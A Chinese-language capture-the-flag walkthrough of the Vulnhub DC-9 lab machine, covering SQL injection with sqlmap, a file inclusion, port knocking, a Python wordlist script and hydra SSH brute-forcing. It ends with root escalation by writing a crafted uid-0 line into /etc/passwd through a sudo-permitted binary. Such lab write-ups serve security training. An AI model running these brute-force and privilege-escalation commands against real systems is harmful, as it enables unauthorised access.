【Vulnhub】DC-9
在 web 的 search 界面找到一存在 sql 注入的页面,然后 sqlmap 跑出来 admin:transorbital1
在 manage 界面用 sqlmap 跑出来的用户名和密码登录,注意到下面有个 File does not exist,文件包含?
file 参数就能包含
burp 测出来的文件包含,注意那个 openSSH,他用了个叫 knockd 的软件,在连接 ssh 之前需要先“敲门”就是依次访问那些端口这样才能连接,这里是 7469,8475,9842
一开始 22 端口是关着的
可以用来 knock 敲门
knock -v 192.168.149.171 7469 8475 9842
也可以 nmap 依次去扫描这些端口
这时候它的 22 端口已经打开了
可以使用之前 sqlmap 跑出来的那一些账户密码配合 hydra 爆破一波 ssh
写个小脚本来把 sqlmap 跑出来的内容生成 user 和 password 的 txt 文件
# -*- coding: UTF-8 -*-
f=open('temp.txt',"r")
user=open("user.txt","a")
passwd=open("pass.txt","a")
for line in f:
temp = line.replace(" ","")
a=temp.split("|")
print(a)
user.write(a[2]+"\n")
passwd.write(a[6]+"\n")
然后 hydra 爆破一波
hydra -L user.txt -w 10 -P pass.txt -t 10 -v 192.168.149.171 ssh-L user.txt 指定爆破账号字典为 user.txt
-w 10 设置最大超时时间10s,默认30s
-P pass.txt 指定密码字典为 pass.txt
-t 10 指定爆破线程为 10 个
-v 指定显示爆破过程
-f 查找到第一个可以使用的账号和密码的时候停止破解
chandlerb:UrAG0D!
janitor:Ilovepeepee
joeyt:Passw0rd
登上 janitor 以后发现存在隐藏文件
把这些密码保存出来再来一遍 hydra 爆破
又多出来一个账户密码 login:B4-Tru3-001,登录之后 sudo -l 发现有个这个东西
尝试执行以下结果发现有个提示:
在这个目录的上两层,发现了 test.py
当传入的参数是三个的时候(第一个就是文件本身了)可以把第二个参数给读出来然后写到第三个文件后面,而且他还是有 root 权限的,所以只要能够个 test 传入
生成 hash
openssl passwd -1 -salt yichen 123456
然后写到 /tmp/passwd
echo 'yichen:$1$yichen$6nzFZVX5T21iu2AmBgzin/:0:0:yichen:/root:/bin/bash' > /tmp/passwd
运行
sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd
就会把我们写在 /tmp/passwd 的内容写到 /etc/passwd
这时候只需要 su yichen,输入密码:123456,就拥有了 root 权限
